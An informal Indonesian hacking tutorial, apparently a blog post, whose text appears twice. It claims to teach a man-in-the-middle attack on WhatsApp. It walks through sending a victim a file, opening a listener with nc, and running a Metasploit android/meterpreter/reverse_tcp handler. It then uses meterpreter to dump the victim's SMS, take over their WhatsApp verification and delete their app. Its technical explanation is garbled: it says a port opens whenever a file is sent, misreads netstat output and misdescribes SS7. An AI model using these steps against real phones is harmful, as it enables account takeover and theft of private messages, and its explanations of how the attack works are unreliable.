*Assalamualaikum Wr.Wb*
materi hari ini : *midle in might*
apa Itu MIM?mim/midle in might adlh
suatu aktivitas yang dimana user hckr
membaca,menela'a dan mengedit
suatu percakapan antara 2 korban :)
biasanya itu terjadi antara *end to end*
pada percakapan whatsapp :P
Bisanya User MIM ini Menggunakan
Metode SS7 dalam program protocol
apa itu ss7?> ss7 adalah suatu program
yang dimana kita menghantam/masuk
kedalam sebuah percakapan berbasis
protocol :P,istilahnya seperti :
*SPYWARE*
mungkin ad yg tw donk berita hri ini
tentang hekel israel :v
tau aja ya :v
~√~√~√~√~√√~√~√~√~√~√~√~√~√~
bagaimana proses jalannya suatu prgrm
tersebut???
gni nih,putra jlsin :)
./ilustrasi>
korban1+korban2 sedang chat ya di wa
ketika ia mengirim suatu file/lampiran
disitulah port protocol terbuka>
dan disitulah hekel masuk kedalam
system pembicaraan melalui jalur akses
protocol :v,ngeri bukan :v
~~~~~~~~~~~~~~~~~~~~~~~~~
anda mau tau bagaimana hekel tsb msk
secara tiba tiba??
anda pnya termos/termux/terminal :v
caranya mudah,cukup anda kirim file
ke korban,file apa aja,klo bisa bokep :v
lalu anda ketik di terminal
$netstat -n
{itu setelah kirim file nya ya sobat"}
maka terminal akan melacak file tsb
seperti ini:
Proto Send-Q Local Address frg Address
Active UNIX domain sockets (w/o servr)
unix 2 [ ] DGRA 2165 @suilst
unix 3 [ ] STREAM CONNECTED 2613 /dev/socket/qmux_radio/qmux_client_socket 572
unix 3 [ ] STREAM CONNECTED 2475847 /dev/socket/qmux_radio/qmux_client_socket 521
~~~~~~~~~~~~~~~~~~~~~~~~~
*CONTOH FILE YG AKU KIRIM TADI*
*NAMANYA SUILST* MAKA PORTNYA
ADLAAH 2613, bagaimana hacker bsa
msuk ???ke port itu???
anda bsa pergi ke sini:
http://www.canyouseeme.org/
dan di situ adalah pengecekan port
masukan port yang tadi di situ jika
forward gagal atau tulisan merah
anda pergi ke termux
dan ketik
$nc -vlp {port yang tadi} tnpa($)
setelah itu check lagi di web itu,
maka akan berhasil :)
~~~~~~~~~~~~~~~~~~~~~~~~~
setelah itu anda tinggal buka metaploit
$msfconsole
nsf>use multi/handler
nsf>set payload android/meterpreter/reverse_tcp
nsf>set lhost=ip yang di web tdi
nsf>set lport=port yang tdi
nsf>exploit
~~~~~~~~~~~~~~~~~~~~~~~~~
lalu kirim ulang file nya ke target :v
setelah ia buka,tanpa download maka
meterpreterpun akan siap :v
setelah sudah masuk ke meterpreter
contoh
meterpreter>
ketik>ifconfig
lalu salin ip dia dan port terbukanya
~~~~~~~~~~~~~~~~~~~~~~~~~
*di fase meterpreter anda bisa*
*mainin apa aja di hp korban secara*
*jauh :v*
*kalo anda mw mainin wa dia*
ketik di meterpreter>
meterpreter>open com.whatsapp
buka whatsapp kloningan km
lalu pasang no target nya di wa km
lalu ada menunggu verty,buka terminal
ketik>
meterpreter>dump_sms
setelah dump berhasil,ketik lagi
meterpreter>delete com.whatsapp
agar wa korban kehapus :v
setelah dumping
cari tau letak hasil dumpingan kita tadi
mamank.:v
buka terminal baru
$cd metasploit-framework
$ls
(disitu ada format txt ga?)
(contoh.sms_dump_20190513175838.txt)
lalu ketik
$nano (file yang tadi.txt)
done lalu liat code nya.deh :v
materi hari ini : *midle in might*
apa Itu MIM?mim/midle in might adlh
suatu aktivitas yang dimana user hckr
membaca,menela'a dan mengedit
suatu percakapan antara 2 korban :)
biasanya itu terjadi antara *end to end*
pada percakapan whatsapp :P
Bisanya User MIM ini Menggunakan
Metode SS7 dalam program protocol
apa itu ss7?> ss7 adalah suatu program
yang dimana kita menghantam/masuk
kedalam sebuah percakapan berbasis
protocol :P,istilahnya seperti :
*SPYWARE*
mungkin ad yg tw donk berita hri ini
tentang hekel israel :v
tau aja ya :v
~√~√~√~√~√√~√~√~√~√~√~√~√~√~
bagaimana proses jalannya suatu prgrm
tersebut???
gni nih,putra jlsin :)
./ilustrasi>
korban1+korban2 sedang chat ya di wa
ketika ia mengirim suatu file/lampiran
disitulah port protocol terbuka>
dan disitulah hekel masuk kedalam
system pembicaraan melalui jalur akses
protocol :v,ngeri bukan :v
~~~~~~~~~~~~~~~~~~~~~~~~~
anda mau tau bagaimana hekel tsb msk
secara tiba tiba??
anda pnya termos/termux/terminal :v
caranya mudah,cukup anda kirim file
ke korban,file apa aja,klo bisa bokep :v
lalu anda ketik di terminal
$netstat -n
{itu setelah kirim file nya ya sobat"}
maka terminal akan melacak file tsb
seperti ini:
Proto Send-Q Local Address frg Address
Active UNIX domain sockets (w/o servr)
unix 2 [ ] DGRA 2165 @suilst
unix 3 [ ] STREAM CONNECTED 2613 /dev/socket/qmux_radio/qmux_client_socket 572
unix 3 [ ] STREAM CONNECTED 2475847 /dev/socket/qmux_radio/qmux_client_socket 521
~~~~~~~~~~~~~~~~~~~~~~~~~
*CONTOH FILE YG AKU KIRIM TADI*
*NAMANYA SUILST* MAKA PORTNYA
ADLAAH 2613, bagaimana hacker bsa
msuk ???ke port itu???
anda bsa pergi ke sini:
http://www.canyouseeme.org/
dan di situ adalah pengecekan port
masukan port yang tadi di situ jika
forward gagal atau tulisan merah
anda pergi ke termux
dan ketik
$nc -vlp {port yang tadi} tnpa($)
setelah itu check lagi di web itu,
maka akan berhasil :)
~~~~~~~~~~~~~~~~~~~~~~~~~
setelah itu anda tinggal buka metaploit
$msfconsole
nsf>use multi/handler
nsf>set payload android/meterpreter/reverse_tcp
nsf>set lhost=ip yang di web tdi
nsf>set lport=port yang tdi
nsf>exploit
~~~~~~~~~~~~~~~~~~~~~~~~~
lalu kirim ulang file nya ke target :v
setelah ia buka,tanpa download maka
meterpreterpun akan siap :v
setelah sudah masuk ke meterpreter
contoh
meterpreter>
ketik>ifconfig
lalu salin ip dia dan port terbukanya
~~~~~~~~~~~~~~~~~~~~~~~~~
*di fase meterpreter anda bisa*
*mainin apa aja di hp korban secara*
*jauh :v*
*kalo anda mw mainin wa dia*
ketik di meterpreter>
meterpreter>open com.whatsapp
buka whatsapp kloningan km
lalu pasang no target nya di wa km
lalu ada menunggu verty,buka terminal
ketik>
meterpreter>dump_sms
setelah dump berhasil,ketik lagi
meterpreter>delete com.whatsapp
agar wa korban kehapus :v
setelah dumping
cari tau letak hasil dumpingan kita tadi
mamank.:v
buka terminal baru
$cd metasploit-framework
$ls
(disitu ada format txt ga?)
(contoh.sms_dump_20190513175838.txt)
lalu ketik
$nano (file yang tadi.txt)
done lalu liat code nya.deh :v
0 Comments